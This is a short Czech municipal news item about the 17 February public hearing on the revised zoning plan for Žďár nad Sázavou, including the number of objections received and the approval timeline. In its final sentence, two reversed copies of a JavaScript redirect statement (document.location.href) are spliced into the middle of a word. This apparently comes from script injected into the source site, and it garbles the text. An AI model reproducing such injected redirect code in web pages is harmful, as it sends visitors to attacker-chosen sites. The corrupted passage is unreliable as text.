Rainbow page separator

Návrh územního plánu bude projednán 17. února v Domě kultury

Čtvrtek, 14. ledna 2016

Kulturní dům Žďár nad Sázavou

Žďár nad Sázavou / Na 17. února bylo stanoveno veřejné projednávání upraveného návrhu územního plánu Žďáru nad Sázavou. Uskuteční se od 16 hodin ve velkém sále Domu kultury. Nový územní plán se začal projednávat v roce 2011, v roce 2013 a 2014 se pak uskutečnila dvě veřejná projednání, kde mohli obyvatelé vznášet své připomínky a námitky k navrženému řešení.
Podáno bylo 284 námitek a 28 připomínek, které jsou jednotlivě vyhodnoceny v odůvodnění návrhu územního plánu. Upravený návrh včetně příloh je zveřejněn na webových stránkách města, rovněž do něj lze nahlédnout v odboru rozvoje a územního plánování žďárské radnice.
Po ukončení veřejného projednávání návrh územního plánu projednají žďárští radní i zastupitelé. Stávající dokument Žďáru nad Sázavou byl schválen v roce 2003. S vydáním nového územního plánu městský úřad počítá v prvním čtvrtletí le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku.